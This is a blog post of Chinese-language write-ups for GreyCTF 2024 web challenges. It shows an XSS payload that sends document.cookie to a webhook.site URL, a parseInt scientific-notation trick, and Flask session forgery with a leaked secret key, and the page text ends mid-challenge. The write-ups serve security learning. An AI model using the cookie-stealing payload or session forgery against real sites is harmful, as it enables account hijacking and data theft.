<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Markdown Parser(114 solves &#x2F; 100 points)题目给了附件，打开题目，发现有一个写markdown的地方，写好之后会自动帮你把格式转换好，之后交给后台检查，那么就是xss，我们直接看源代码，直接看最关键的文件，是怎么格式化markdown的 123456789101112131415161718192021222324252627282930313233">
<meta property="og:type" content="article">
<meta property="og:title" content="graycatCTF2024 wp">
<meta property="og:url" content="http://example.com/2024/07/14/graycatCTF2024-wp/index.html">
<meta property="og:site_name" content="oSthing&#39;s Blog">
<meta property="og:description" content="Markdown Parser(114 solves &#x2F; 100 points)题目给了附件，打开题目，发现有一个写markdown的地方，写好之后会自动帮你把格式转换好，之后交给后台检查，那么就是xss，我们直接看源代码，直接看最关键的文件，是怎么格式化markdown的 123456789101112131415161718192021222324252627282930313233">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-07-14T05:31:49.000Z">
<meta property="article:modified_time" content="2024-07-23T00:58:43.372Z">
<meta property="article:author" content="oSthing">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>graycatCTF2024 wp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/08/20/JAVA-SEC%E4%BB%8E0-5%E5%88%B01/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/07/14/osu-gamingCTF2024-wp/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/07/14/graycatCTF2024-wp/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/07/14/graycatCTF2024-wp/&text=graycatCTF2024 wp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/07/14/graycatCTF2024-wp/&is_video=false&description=graycatCTF2024 wp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=graycatCTF2024 wp&body=Check out this article: http://example.com/2024/07/14/graycatCTF2024-wp/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/07/14/graycatCTF2024-wp/&name=graycatCTF2024 wp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/07/14/graycatCTF2024-wp/&t=graycatCTF2024 wp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Markdown-Parser-114-solves-100-points"><span class="toc-number">1.</span> <span class="toc-text">Markdown Parser(114 solves &#x2F; 100 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Greyctf-Survey-154-solves-100-points"><span class="toc-number">2.</span> <span class="toc-text">Greyctf Survey(154 solves &#x2F; 100 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Baby-Web-183-solves-100-points"><span class="toc-number">3.</span> <span class="toc-text">Baby Web(183 solves &#x2F; 100 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Beautiful-Styles-70-solves-100-points"><span class="toc-number">4.</span> <span class="toc-text">Beautiful Styles(70 solves &#x2F; 100 points)</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        graycatCTF2024 wp
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">oSthing</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-07-14T05:31:49.000Z" class="dt-published" itemprop="datePublished">2024-07-14</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ctf/" rel="tag">ctf</a>, <a class="p-category" href="/tags/wp/" rel="tag">wp</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="Markdown-Parser-114-solves-100-points"><a href="#Markdown-Parser-114-solves-100-points" class="headerlink" title="Markdown Parser(114 solves &#x2F; 100 points)"></a><strong>Markdown Parser</strong>(114 solves &#x2F; 100 points)</h2><p>题目给了附件，打开题目，发现有一个写markdown的地方，写好之后会自动帮你把格式转换好，之后交给后台检查，那么就是xss，我们直接看源代码，直接看最关键的文件，是怎么格式化markdown的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">parseMarkdown</span>(<span class="params">markdownText</span>) &#123;</span><br><span class="line">    <span class="keyword">const</span> lines = markdownText.<span class="title function_">split</span>(<span class="string">&#x27;\n&#x27;</span>);</span><br><span class="line">    <span class="keyword">let</span> htmlOutput = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    <span class="keyword">let</span> inCodeBlock = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    lines.<span class="title function_">forEach</span>(<span class="function"><span class="params">line</span> =&gt;</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (inCodeBlock) &#123;</span><br><span class="line">            <span class="keyword">if</span> (line.<span class="title function_">startsWith</span>(<span class="string">&#x27;```&#x27;</span>)) &#123;</span><br><span class="line">                inCodeBlock = <span class="literal">false</span>;</span><br><span class="line">                htmlOutput += <span class="string">&#x27;&lt;/code&gt;&lt;/pre&gt;&#x27;</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                htmlOutput += <span class="title function_">escapeHtml</span>(line) + <span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> (line.<span class="title function_">startsWith</span>(<span class="string">&#x27;```&#x27;</span>)) &#123;</span><br><span class="line">                language = line.<span class="title function_">substring</span>(<span class="number">3</span>).<span class="title function_">trim</span>();</span><br><span class="line">                inCodeBlock = <span class="literal">true</span>;</span><br><span class="line">                htmlOutput += <span class="string">&#x27;&lt;pre&gt;&lt;code class=&quot;language-&#x27;</span> + language + <span class="string">&#x27;&quot;&gt;&#x27;</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                line = <span class="title function_">escapeHtml</span>(line);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/`(.*?)`/g</span>, <span class="string">&#x27;&lt;code&gt;$1&lt;/code&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/^(######\s)(.*)/</span>, <span class="string">&#x27;&lt;h6&gt;$2&lt;/h6&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/^(#####\s)(.*)/</span>, <span class="string">&#x27;&lt;h5&gt;$2&lt;/h5&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/^(####\s)(.*)/</span>, <span class="string">&#x27;&lt;h4&gt;$2&lt;/h4&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/^(###\s)(.*)/</span>, <span class="string">&#x27;&lt;h3&gt;$2&lt;/h3&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/^(##\s)(.*)/</span>, <span class="string">&#x27;&lt;h2&gt;$2&lt;/h2&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/^(#\s)(.*)/</span>, <span class="string">&#x27;&lt;h1&gt;$2&lt;/h1&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/\*\*(.*?)\*\*/g</span>, <span class="string">&#x27;&lt;strong&gt;$1&lt;/strong&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/__(.*?)__/g</span>, <span class="string">&#x27;&lt;strong&gt;$1&lt;/strong&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/\*(.*?)\*/g</span>, <span class="string">&#x27;&lt;em&gt;$1&lt;/em&gt;&#x27;</span>);</span><br><span class="line">                line = line.<span class="title function_">replace</span>(<span class="regexp">/_(.*?)_/g</span>, <span class="string">&#x27;&lt;em&gt;$1&lt;/em&gt;&#x27;</span>);</span><br><span class="line">                htmlOutput += line;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> htmlOutput;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">escapeHtml</span>(<span class="params">text</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> text</span><br><span class="line">        .<span class="title function_">replace</span>(<span class="regexp">/&amp;/g</span>, <span class="string">&#x27;&amp;amp;&#x27;</span>)</span><br><span class="line">        .<span class="title function_">replace</span>(<span class="regexp">/&lt;/g</span>, <span class="string">&#x27;&amp;lt;&#x27;</span>)</span><br><span class="line">        .<span class="title function_">replace</span>(<span class="regexp">/&gt;/g</span>, <span class="string">&#x27;&amp;gt;&#x27;</span>)</span><br><span class="line">        .<span class="title function_">replace</span>(<span class="regexp">/&quot;/g</span>, <span class="string">&#x27;&amp;quot;&#x27;</span>)</span><br><span class="line">        .<span class="title function_">replace</span>(<span class="regexp">/&#x27;/g</span>, <span class="string">&#x27;&amp;#039;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = &#123;</span><br><span class="line">    parseMarkdown</span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>有了之前比赛的经验，一眼就能看到这里有能注入的地方</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">htmlOutput += <span class="string">&#x27;&lt;pre&gt;&lt;code class=&quot;language-&#x27;</span> + language + <span class="string">&#x27;&quot;&gt;&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>用引号把他闭合，随即构造出payload</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">```js&quot; onload=&quot;alert(1)</span><br><span class="line">```</span><br></pre></td></tr></table></figure>

<p>上传解析后构造出来的是下面标签</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">code</span> <span class="attr">class</span>=<span class="string">&quot;language-js hljs language-javascript&quot;</span> <span class="attr">onload</span>=<span class="string">&quot;alert(1)&quot;</span> <span class="attr">data-highlighted</span>=<span class="string">&quot;yes&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">code</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是发现并没有弹窗</p>
<p>随后我尝试了onerror onblur onfocus ononline等等都没有效果，就只有一个onclick有效果，但是我们看到机器人是没有click的动作的，也是在这一个地方钻的太死了，随后就想到用尖括号闭合后再构造一个<code>&lt;script&gt;</code>出来，构造下面payload</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">```12&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&quot;</span><br><span class="line">```</span><br></pre></td></tr></table></figure>

<p>成功弹窗</p>
<p>被解析后的代码如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">code</span> <span class="attr">class</span>=<span class="string">&quot;language-12&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span>&quot;&quot;<span class="symbol">&amp;gt;</span><span class="tag">&lt;/<span class="name">code</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>那么接下来就是把cookie弹到接收站</p>
<p>构造下面</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">```12&quot;&gt;&lt;script&gt;fetch(`https://webhook.site/886c0266-b6f5-4dc0-ae07-a9565f6b907a/`+document.cookie)&lt;/script&gt;&quot;</span><br><span class="line">```</span><br></pre></td></tr></table></figure>

<p>上传后台得到下面收包</p>
<p>获得flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grey&#123;m4rkd0wn_th1s_fl4g&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Greyctf-Survey-154-solves-100-points"><a href="#Greyctf-Survey-154-solves-100-points" class="headerlink" title="Greyctf Survey(154 solves &#x2F; 100 points)"></a><strong>Greyctf Survey</strong>(154 solves &#x2F; 100 points)</h2><p>同样题目给了源码，题目里面有个滑条，然后提交，不知道要干什么，直接看源码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> bodyParser = <span class="built_in">require</span>(<span class="string">&#x27;body-parser&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">const</span> port = <span class="number">3000</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> config = <span class="built_in">require</span>(<span class="string">&quot;./config.json&quot;</span>);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(bodyParser.<span class="title function_">json</span>())</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(<span class="string">&quot;/&quot;</span>, express.<span class="title function_">static</span>(<span class="string">&quot;static&quot;</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> score = -<span class="number">0.42069</span>;</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/status&quot;</span>, <span class="title function_">async</span> (req, res)=&gt;&#123;</span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">json</span>(&#123;</span><br><span class="line">        <span class="string">&quot;error&quot;</span>: <span class="literal">false</span>,</span><br><span class="line">        <span class="string">&quot;data&quot;</span>: score</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&#x27;/vote&#x27;</span>, <span class="title function_">async</span> (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123;vote&#125; = req.<span class="property">body</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">typeof</span> vote != <span class="string">&#x27;number&#x27;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">json</span>(&#123;</span><br><span class="line">            <span class="string">&quot;error&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="string">&quot;msg&quot;</span>:<span class="string">&quot;Vote must be a number&quot;</span></span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(vote &lt; <span class="number">1</span> &amp;&amp; vote &gt; -<span class="number">1</span>) &#123;</span><br><span class="line">        score += <span class="built_in">parseInt</span>(vote);</span><br><span class="line">        <span class="keyword">if</span>(score &gt; <span class="number">1</span>) &#123;</span><br><span class="line">            score = -<span class="number">0.42069</span>;</span><br><span class="line">            <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">json</span>(&#123;</span><br><span class="line">                <span class="string">&quot;error&quot;</span>: <span class="literal">false</span>,</span><br><span class="line">                <span class="string">&quot;msg&quot;</span>: config.<span class="property">flag</span>,</span><br><span class="line">            &#125;);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">json</span>(&#123;</span><br><span class="line">            <span class="string">&quot;error&quot;</span>: <span class="literal">false</span>,</span><br><span class="line">            <span class="string">&quot;data&quot;</span>: score,</span><br><span class="line">            <span class="string">&quot;msg&quot;</span>: <span class="string">&quot;Vote submitted successfully&quot;</span></span><br><span class="line">        &#125;);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">json</span>(&#123;</span><br><span class="line">            <span class="string">&quot;error&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="string">&quot;msg&quot;</span>:<span class="string">&quot;Invalid vote&quot;</span></span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(port, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`Survey listening on port <span class="subst">$&#123;port&#125;</span>`</span>)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>代码很好懂，滑动滑条，提交<code>vote</code>，<code>score</code>会加上一个<code>vote</code>如果<code>score</code>的值大于1，那么就输出flag，按照理论来说随便传两个0.99就通过了，但是发现还是没有flag，并且这个比赛都是公共靶机，如果有人一直恶意发包那么<code>score</code>的值就永远是-0.42069，那么我们就要找找其他的漏洞，我们可以看到在增加score的地方</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">score += <span class="built_in">parseInt</span>(vote);</span><br></pre></td></tr></table></figure>

<p>这里用了<code>parseInt</code>来将<code>vote</code>转换成整型int，但是<code>parseInt</code>函数有一个问题，参考文章</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://dmitripavlutin.com/parseint-mystery-javascript/">https://dmitripavlutin.com/parseint-mystery-javascript/</a></p>
</blockquote>
<p>文章里测试到</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.5</span>);      <span class="comment">// =&gt; 0</span></span><br><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.05</span>);     <span class="comment">// =&gt; 0</span></span><br><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.005</span>);    <span class="comment">// =&gt; 0</span></span><br><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.0005</span>);   <span class="comment">// =&gt; 0</span></span><br><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.00005</span>);  <span class="comment">// =&gt; 0</span></span><br><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.000005</span>); <span class="comment">// =&gt; 0</span></span><br><span class="line"><span class="built_in">parseInt</span>(<span class="number">0.0000005</span>); <span class="comment">// =&gt; 5</span></span><br></pre></td></tr></table></figure>

<p> 这是因为<code>0.0000005</code>会被解析成科学技术法<code>5e-7</code></p>
<p>所以只要传<code>0.0000005</code>就能大于1了</p>
<p>抓包改值发送</p>
<p>得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grey&#123;50m371m35_4_l177l3_6035_4_l0n6_w4y&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Baby-Web-183-solves-100-points"><a href="#Baby-Web-183-solves-100-points" class="headerlink" title="Baby Web(183 solves &#x2F; 100 points)"></a><strong>Baby Web</strong>(183 solves &#x2F; 100 points)</h2><p>给了一个附件，里面是python flask的代码，是一段不完整的代码，先看源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, render_template, session</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = <span class="string">&quot;baby-web&quot;</span></span><br><span class="line">FLAG = os.getenv(<span class="string">&quot;FLAG&quot;</span>, <span class="string">r&quot;grey&#123;fake_flag&#125;&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="comment"># Set session if not found</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;is_admin&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line">        session[<span class="string">&quot;is_admin&quot;</span>] = <span class="literal">False</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/admin&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">admin</span>():</span><br><span class="line">    <span class="comment"># Check if the user is admin through cookies</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;admin.html&quot;</span>, flag=FLAG, is_admin=session.get(<span class="string">&quot;is_admin&quot;</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">### Some other hidden code ###</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">True</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>判断<code>is_admin</code>是否等于<code>true</code>，给了<code>secret_key</code>那么就非常方便能伪造了</p>
<p>打开网站拿到<code>session</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eyJpc19hZG1pbiI6ZmFsc2V9.ZiVFcQ.w2yt1Nh884RwoYjrrtGaB20CBMs</span><br></pre></td></tr></table></figure>

<p>然后丢到flask session的爆破脚本里</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 flask_session_cookie_manager3.py decode -c <span class="string">&quot;eyJpc19hZG1pbiI6dHJ1ZX0.ZiP8Eg.17rmypB5zIhBJp9Ve4pgJfLwJsw&quot;</span> -s <span class="string">&quot;baby-web&quot;</span></span><br></pre></td></tr></table></figure>

<p>爆破拿到格式</p>
